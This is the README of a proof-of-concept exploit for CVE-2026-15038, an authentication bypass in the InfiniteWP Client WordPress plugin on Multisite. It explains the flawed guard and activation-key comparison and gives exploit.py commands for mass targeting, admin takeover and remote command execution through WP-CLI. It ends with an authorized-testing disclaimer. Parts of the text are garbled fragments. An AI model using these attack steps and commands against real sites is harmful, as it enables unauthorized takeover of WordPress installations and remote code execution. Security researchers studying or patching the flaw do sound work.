
Exploit PoC pour CVE-2026-15038 dans le plugin WordPress InfiniteWP Client : contourne l'authentification sur Multisite, lie la clé RSA de l'attaquant, escalade vers une prise de contrôle admin et exécute des commandes à distance via WP-CLI.
Prise de contrôle non authentifiée de compte administrateur dans WordPress Multisite
Le plugin InfiniteWP Client pour WordPress (< 1.13.6) contient une vulnérabilité critique de contournement d'authentification affectant les installations Multisite.
Un attaquant non authentifié peut :
if (!$iwp_mmb_core->get_option('iwp_client_action_message_id')
&& !$iwp_mmb_core->get_option('iwp_client_public_key'))
get_site_option() → lit au niveau du réseau (wp_sitemeta)update_blog_option() → écrit au niveau de chaque blog (wp_X_options)💥 Résultat : Sur Multisite, la garde renvoie toujours false — le re-appairage est toujours autorisé.
if(trim($activation_key) != get_option('iwp_client_activate_key')){
get_option() renvoie falseactivation_key → trim(null) → '''' != false → false → le contrôle est passé 🎯openssl_verify() réussitgraph LR
A[Send POST Request] --> B[Add Site Action]
B --> C[Guard Bypassed]
C --> D[Activation Key Check Fails]
D --> E[Signature Verifies]
E --> F[Attacker Key Bound]
F --> G[Full Admin Access]
G --> H[RCE Achieved]
# Clone the repository
git clone https://github.com/yourusername/CVE-2026-15038.git
cd CVE-2026-15038
# Install dependencies
pip install -r requirements.txt
python3 exploit.py -t https://wordpress.ddev.site
python3 exploit.py -t https://target1.com -t https://target2.com -t https://target3.com
python3 exploit.py -t https://wordpress.ddev.site --command "wp plugin install hello-dolly --activate"
python3 exploit.py -t https://wordpress.ddev.site --takeover --rce
| File | Description |
|---|---|
exploit.py | 🐍 Script d'exploitation principal avec prise en charge de l'exploitation de masse |
requirements.txt | 📦 Dépendances Python |
README.md | 📖 Cette documentation |
add_site récentes dans les journauxCet outil est destiné uniquement à des fins éducatives et de tests de sécurité. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.